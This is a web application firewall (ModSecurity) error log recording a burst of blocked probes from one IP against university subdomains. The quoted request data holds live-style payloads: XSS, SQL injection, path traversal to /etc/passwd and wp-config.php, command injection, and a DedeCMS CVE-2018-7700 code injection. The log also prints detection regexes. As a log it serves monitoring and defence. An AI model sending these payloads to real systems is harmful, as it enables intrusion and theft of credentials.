[Tue Aug 29 11:46:47.461150 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAjKyskAAAAQ"]
[Tue Aug 29 11:46:47.551448 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:refurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: }}}; found within ARGS:refurl: }}};alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/owa/auth/frowny.aspx"] [unique_id "ZO14N8Co-f0AAAjKysoAAAAQ"]
[Tue Aug 29 11:46:49.655220 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAi3Z1oAAAAP"]
[Tue Aug 29 11:46:49.668178 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAjW9AAAAAAA"]
[Tue Aug 29 11:46:49.677003 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAi3Z1sAAAAP"]
[Tue Aug 29 11:46:49.725196 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OcCo-f0AAAhT374AAAAD"]
[Tue Aug 29 11:46:50.440468 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAhBSJ4AAAAX"]
[Tue Aug 29 11:46:50.621629 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:id: -1 UNION SELECT 1,md5(999999999),3,4,5,6,7,8--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14OsCo-f0AAAjM7AwAAAAT"]
[Tue Aug 29 11:46:51.371888 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14O8Co-f0AAAjCa-0AAAAB"]
[Tue Aug 29 11:46:52.367012 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAcsLcQAAAAE"]
[Tue Aug 29 11:46:52.386176 2023] [:error] [pid 2247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjH@xMAAAAI"]
[Tue Aug 29 11:46:52.388050 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjIhjwAAAAJ"]
[Tue Aug 29 11:46:52.389703 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAcsLcUAAAAE"]
[Tue Aug 29 11:46:52.497021 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sites/all/modules/avatar_uploader/lib/demo/view.php"] [unique_id "ZO14PMCo-f0AAAjIhkEAAAAJ"]
[Tue Aug 29 11:46:54.949477 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14PsCo-f0AAAjYrAQAAAAK"]
[Tue Aug 29 11:46:54.968199 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14PsCo-f0AAAjYrAUAAAAK"]
[Tue Aug 29 11:46:55.008895 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjYrAcAAAAK"]
[Tue Aug 29 11:46:55.114989 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjcHVoAAAAY"]
[Tue Aug 29 11:46:55.157455 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjcHVwAAAAY"]
[Tue Aug 29 11:46:55.999695 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAhzvoUAAAAx"]
[Tue Aug 29 11:47:00.493676 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjZRX4AAAAS"]
[Tue Aug 29 11:47:00.495187 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAhBSKwAAAAX"]
[Tue Aug 29 11:47:00.495949 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjcHWoAAAAY"]
[Tue Aug 29 11:47:00.512916 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjZRX8AAAAS"]
[Tue Aug 29 11:47:01.352100 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjIhmYAAAAJ"]
[Tue Aug 29 11:47:01.391979 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjdQLAAAAAZ"]
[Tue Aug 29 11:47:01.396741 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAfECBkAAAAO"]
[Tue Aug 29 11:47:01.397984 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAhT39YAAAAD"]
[Tue Aug 29 11:47:01.398861 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAhtjpUAAAAq"]
[Tue Aug 29 11:47:01.412329 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjcHW0AAAAY"]
[Tue Aug 29 11:47:01.423650 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjL8SgAAAAR"]
[Tue Aug 29 11:47:02.408158 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjKyuoAAAAQ"]
[Tue Aug 29 11:47:02.417393 2023] [:error] [pid 2263] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjXsgEAAAAG"]
[Tue Aug 29 11:47:02.466059 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjM7B4AAAAT"]
[Tue Aug 29 11:47:02.486024 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjM7B8AAAAT"]
